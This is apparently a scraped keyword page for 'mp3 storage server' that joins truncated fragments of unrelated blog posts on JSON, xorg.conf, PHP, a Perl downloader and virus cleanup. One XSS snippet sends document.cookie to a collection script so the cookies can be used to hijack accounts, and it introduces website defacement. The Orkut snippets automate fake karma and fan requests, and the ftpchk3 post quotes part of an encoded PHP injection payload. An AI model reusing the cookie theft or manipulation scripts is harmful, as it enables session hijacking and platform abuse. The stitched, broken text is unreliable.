14 Aug, 2010
Mp3 storage server
Articles related to mp3 storage server
http://digitalpbk.blogspot.com/2007/06/json-javascript-object-notation.html
response, we have to use the following notation,Suppose we are returning an XML response from a
server using Ajax. The common method to extract the useful information is :var xml = xmlHttp.responseXML;var list= xml.getElementsByTagName("TAG");for(i=0;i {// loop through and extract the values}This can be replaced with the new JSON object notation byvar strobj = xmlHttp.responseText;var obj = eval("("+strobj+")");obj.an_array[0];obj.a_multi_array[0][0];// ....The Notation ...
Published 4 years, 11 months ago
http://digitalpbk.blogspot.com/2007/05/xorgconf-file-settings-for-beryl-and.html
Xorg.conf File Settings for Beryl and Desktop-effects
NoteThe following is my /etc/X11/xorg.conf file on which beryl and desktop-effects work.NVidia Graphics Card. If you are unable to enable the desktop-effects or beryl,try copy pasting the Module, Device and Screen Sections to your xorg.conf file.Please back up your existing xorg.conf file before changing anything.# Xorg configuration created by livna-config-displaySection
"ServerLayout" Identifier "single head ...
Published 5 years ago
http://digitalpbk.blogspot.com/2007/01/increasing-karma-ratings-on-orkut.html
, the 3 get requests must not be sent to the
server together. Leave a time delay of about 100ms between each of the GET requests.You can accomplish this in javascript by the following this template: function fn(index){ var links=new Array("Link 1 for cool/trusty/sexy/fan", "etc fill in"); var i= new Image(); i.src = links[index]; if(index != Count) { window.setTimeout("fn("+(index+1)+")",100); } else window.location = "Somewhere"; //Redirect ...
Published 5 years, 3 months ago
http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html
();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;This code will send the cookies to your
server. Now embeding the script in url can be done as discussed in part 1.Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).Defacing a websiteTo deface a website , the site must have a system which puts something you submit on their site (like ...
Published 5 years, 5 months ago
http://digitalpbk.com/php/warning-cannot-modify-header-information-headers-already-sent
as On and restart Apache
server.
; Output buffering allows you to send header lines (including cookies) even
; after you send body content, at the price of slowing PHP's output layer a
; bit. You can enable output buffering during runtime by calling the output
; buffering functions. You can also enable output buffering for all files by
; setting this directive to On. If you wish to limit the size of the buffer
; to a certain size - you can use a maximum number of bytes instead of 'On', ...
Published 2 years, 2 months ago
http://digitalpbk.blogspot.com/2008/06/ubuntu-compaq-presario-black-white-xorg.html
.Xorg.conf# nvidia-xconfig: X configuration file generated by nvidia-xconfig# nvidia-xconfig: version 1.0 (buildmeister@builder26) Thu Feb 14 18:13:41 PST 2008# nvidia-settings: X configuration file generated by nvidia-settings# nvidia-settings: version 1.0 (buildd@yellow) Tue Mar 4 20:28:57 UTC 2008# xorg.conf (X.Org X Window System
server configuration file)## This file was generated by dexconf, the Debian X Configuration tool, using# values from the debconf database.## Edit this file with caution ...
Published 3 years, 10 months ago
http://digitalpbk.blogspot.com/2009/04/jwgkvsqvmx-conficker-virus-manual.html
, this is the virus. A list of valid entries in the field (from Microsoft) is given below to help you find the random string. (Usually at the end).AppMgmtAudioSrvBrowserCryptSvcDMServerEventSystemHidServIasIpripIrmonLanman
ServerLanmanWorkstationMessengerNetmanNlaNtmssvcNWCWorkstationNwsapagentRasautoRasmanRemoteaccessSacsvrScheduleSeclogonSENSSharedaccessThemesTrkWksTrkSvrW32TimeWZCSVCWmiWmdmPmSpwinmgmtwuauservBITSShellHWDetectionuploadmgrWmdmPmSNxmlprovAeLookupSvchelpsvcNote the random string. (in this case ...
Published 3 years, 1 month ago
http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html
server programs and/or the anonymous user access being activated in your FTP configuration. What it does?It adds scripts to html, javascript files and adds a unique php script code to the beginning of every php file. It looks like kYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tc..//Truncated..ZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdiMHNyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N ...
Published 2 years, 7 months ago
http://digitalpbk.blogspot.com/2006/11/how-to-make-more-fans-on-orkut.html
.Hope it works for you ...Happy OrkuttingFor advanced uses with knowledge in PHP and
server accessYou guys can make a PHP script that takes a GET argument the id of your friend, and embend a img or script such that a GET request is made to the correct url. eg: http://www.yoursite.com/makefan.php?to=US1010101010makefan.php:if(isset($_GET["to"])){$to = $_GET["to"];}else {$to="US00000000";}?>function ld(){var img ...
Published 5 years, 6 months ago
http://digitalpbk.blogspot.com/2008/06/perl-download-manager.html
Perl Download Manager
IntroThis is my PERL downloader program, with resume.Only works if
SERVER has Parts enabled.Well pretty much thats it #!/usr/bin/perluse strict;use threads;use threads::shared;use HTTP::Request;use HTTP::Response;use Math::Round qw(nearest);use LWP;exit unless(defined $ARGV[0] && -e $ARGV[0]);open HND,$ARGV[0];NEXT:while(my $url = ){ my $file = substr($url,rindex($url,"/")+1); $file =~ s/%20/_/g; chomp $url; exit if($url eq "" || $file eq ...
Published 3 years, 11 months ago
Related help topics for mp3 storage server
More keywords like mp3 storage server
More pages for mp3 storage server